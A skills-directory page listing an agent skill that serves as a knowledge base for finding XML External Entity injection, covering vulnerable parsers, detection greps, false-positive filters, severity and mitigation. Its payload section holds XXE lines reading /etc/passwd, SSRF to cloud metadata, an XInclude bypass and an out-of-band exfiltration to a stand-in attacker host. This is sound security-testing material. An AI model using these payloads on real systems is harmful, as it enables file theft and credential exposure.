Skills DirectorySkills Directory
SkillsLearnSecurityCategoriesDocsCommunityBlog
Sign InSubmit Skill
Skills Directory

Security-tested agent skills for Claude, coding agents, and AI workflows.

Directory

  • Browse Skills
  • All Skills A–Z
  • Claude Skills
  • Claude Code Skills
  • Agent Skills
  • Categories
  • Authors
  • Submit a Skill

Learn

  • Learn Hub
  • Install Claude Skills
  • Write SKILL.md
  • Skills vs MCP
  • Directories Compared

Security

  • Security
  • Methodology
  • Secure Claude Skills
  • Security Badges

Company

  • About
  • Community
  • Blog
  • API Docs
  • Advertise

2026 Skills Directory. All rights reserved.

ProTermsPrivacyRefunds
Back to skills

Sh Kb Xxe

BSecurity

Knowledge base for finding XML External Entity injection - XML parsers configured to resolve external/general entities on untrusted input, enabling file read, SSRF, and DoS. Use when hunting XXE. CWE-611/776/827, OWASP A05:2021-Security Misconfiguration.

14 stars
0 votes
0 copies
0 views
Added 9/28/2026
ai-agentspythonrustjavaphpnodeapisecurity

Works with

api

Security Analysis

B75/100
criticalAccesses sensitive system or user directories

Scanned 9/28/2026

Install to Claude Code

$npx -y skills add dmdhrumilmistry/security-harness --skill sh-kb-xxe --agent claude-code

Installs into .claude/skills of the current project.

Are you the author of Sh Kb Xxe?

Add the live security badge to your README — it updates automatically with every re-scan.

Security grade badge for Sh Kb Xxe
[![Security: B — Skills Directory](https://www.skillsdirectory.com/api/skills/dmdhrumilmistry-sh-kb-xxe-security-harness/badge)](https://www.skillsdirectory.com/skills/dmdhrumilmistry-sh-kb-xxe-security-harness)

More formats (shields.io, HTML) on the badges page.

Files
SKILL.md
---
name: sh-kb-xxe
description: "Knowledge base for finding XML External Entity injection - XML parsers configured to resolve external/general entities on untrusted input, enabling file read, SSRF, and DoS. Use when hunting XXE. CWE-611/776/827, OWASP A05:2021-Security Misconfiguration."
---

# XML External Entity (XXE) - Hunter Knowledge Base

An XML parser that resolves external entities processes attacker-supplied XML, letting a DTD declare
entities that read local files, make server-side requests (SSRF), or exhaust resources (billion laughs).

## When to hunt this
Any endpoint that parses XML from users: SOAP, XML APIs, SVG/DOCX/XLSX/SVG uploads (zip-of-XML), SAML
responses, RSS/Atom import, XML config upload, `Content-Type: application/xml` or `text/xml` handlers.

## Sinks by ecosystem (grep targets)
- **Java**: `DocumentBuilderFactory`, `SAXParserFactory`, `XMLInputFactory`, `TransformerFactory`,
  `SAXReader`, `Unmarshaller`, `XMLReader` - vulnerable unless external entities/DTDs are disabled.
- **Python**: `xml.etree.ElementTree` (older), `lxml.etree` with `resolve_entities=True`/custom resolver,
  `xml.dom.minidom`, `xml.sax` - `defusedxml` is the safe replacement.
- **PHP**: `simplexml_load_string`/`DOMDocument->loadXML` with `LIBXML_NOENT`/`LIBXML_DTDLOAD`.
- **.NET**: `XmlDocument`/`XmlTextReader` with `DtdProcessing=Parse` and a non-null `XmlResolver`.
- **Node**: `libxmljs` with `noent:true`, some SOAP/`xml2js` configs.

## Detection recipe
1. `graft grep "DocumentBuilderFactory|SAXParser|XMLInputFactory|loadXML|simplexml_load|lxml.etree|XmlReader|DtdProcessing" --json`.
2. Confirm the parser reads untrusted XML.
3. Check whether external entities / DTDs are **disabled** (see filters). If defaults are left on (many
   parsers resolve entities by default), flag.

## Payloads / PoC
- File read: a DOCTYPE with `<!ENTITY xxe SYSTEM "file:///etc/passwd">` then reference `&xxe;` in an element.
- SSRF: `<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">`.
- Blind/OOB (parser suppresses output): external DTD hosted by attacker exfiltrating via a parameter entity
  to `http://attacker/?%file;`.
- Billion laughs DoS: nested entity expansion.
- SVG/Office upload: embed the DOCTYPE inside the XML part of an uploaded SVG/DOCX.
- **XInclude (no DOCTYPE needed)**: when the app rejects/strips a `DOCTYPE` but drops attacker XML into an
  existing document's body (not the whole document), a `DOCTYPE` declaration isn't possible - instead use
  `xi:include` if the parser has XInclude enabled: `<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>`.
  This bypasses DOCTYPE-based filters entirely, so "no `<!DOCTYPE`" is not itself a false-positive signal -
  check whether XInclude is also disabled (`setXIncludeAware(false)` in Java, or equivalent).

## False-positive filters
- Parser hardened: `disallow-doctype-decl` true, `external-general-entities`/`external-parameter-entities`
  false, `XMLResolver=null`, `resolve_entities=False`, using `defusedxml`, `LIBXML_NONET` and DTD loading off,
  .NET `DtdProcessing.Prohibit`.
- Java specifically: hardening must **also** set `setXIncludeAware(false)` and `ACCESS_EXTERNAL_DTD`/
  `ACCESS_EXTERNAL_SCHEMA` to `""` (JAXP 1.5+) - `disallow-doctype-decl` alone still leaves XInclude and
  external-schema resolution reachable. For SAX/StAX, confirm the hardened factory/property is applied to
  every reader instance the factory creates, not just the factory object itself.
- .NET 4.5.2+ defaults (`XmlReader`, `XDocument`) are safe out of the box; only flag older TFMs or explicit
  `XmlTextReader`/`XmlDocument` use without the settings above. PHP 8.0+ disables external entities by
  default; only flag PHP <8.0 without `libxml_set_external_entity_loader(null)`/`LIBXML_NOENT` off.
- Input is JSON, not XML; or XML comes only from a trusted internal source.

## CWE / OWASP / severity
CWE-611 (XXE), CWE-776 (entity expansion), CWE-827. OWASP A05:2021. File read of secrets or SSRF to
metadata -> **high/critical**; DoS-only -> medium.

## Chaining hints
XXE file read -> `secrets` (config/keys) -> further access; XXE -> `ssrf` -> cloud metadata/internal;
present in SAML flows -> `auth` bypass.

## Mitigation
Disable DTDs and external entity resolution on every XML parser handling untrusted input (use the
hardened factory settings above or a safe library like `defusedxml`); also disable XInclude
(`setXIncludeAware(false)`) since it is a separate feature from DTD/entity processing and is not covered by
`disallow-doctype-decl`; prefer JSON where possible; validate uploads that are XML-backed (SVG/Office) with
the same hardening.

Attribution

dmdhrumilmistrydmdhrumilmistry
View sourceMore from dmdhrumilmistry →
SSkills DirectorySkills Directory

Ship a skill? Prove it's safe.

Free 120-pattern security scan, letter grade, and an embeddable README badge.

Submit a skill

Is this your skill, or is something wrong with this listing? Request removal or report an issue. Author removals are honored within 72 hours.

Comments (0)

No comments yet. Be the first to comment!

SSkills DirectorySkills Directory

Ship a skill? Prove it's safe.

Free 120-pattern security scan, letter grade, and an embeddable README badge.

Submit a skill

Related Skills

Caveman

Ultra-compressed communication mode that cuts output tokens while keeping technical accuracy. Levels: lite, full, ultra and the wenyan variants. Use for /caveman, "caveman mode", "talk like caveman", "be brief" or "less tokens".

1074701 votes

Hyperplan

Adversarial multi-agent planning skill. Self-orchestrates 5 hostile category members (unspecified-low, unspecified-high, deep, ultrabrain, artistry) via team-mode for ruthless cross-critique debate, distills only the defensible insights, then MANDATORILY hands the distilled insight bundle to the `plan` agent for executable plan formalization. Use when planning needs maximum rigor and surfacing of weak assumptions, blind spots, and over-engineering. Triggers: 'hyperplan', 'hpp', '/hyperplan', ...

695601 votes

Mcp Code Execution

Routes multi-tool workflows through MCP servers for large datasets and pipelines. Use when Bash tool overhead is limiting throughput on data-heavy tasks.

3351 votes

catchup

Recovers the conversation and failed tool calls of a previous Codex, Claude Code, Antigravity, Cline, Copilot CLI, Cursor, DeepSeek Harness, Kimi, OpenCode, Pi Agent, or ZCode session. Use when the user says "catch up", "what did the last session do", "get me up to speed", "I switched agents", asks to recover/summarize a previous session before continuing, or asks to diagnose or report a catchup failure. Do NOT use for the current conversation, git history, or any non-agent log.

691 votes

math-skill

A comprehensive mathematical reasoning skill for AI assistants — handles arithmetic to research-level problems with rigorous step-by-step reasoning, systematic verification, and transparent uncertainty handling

381 votes
View all in ai-agents →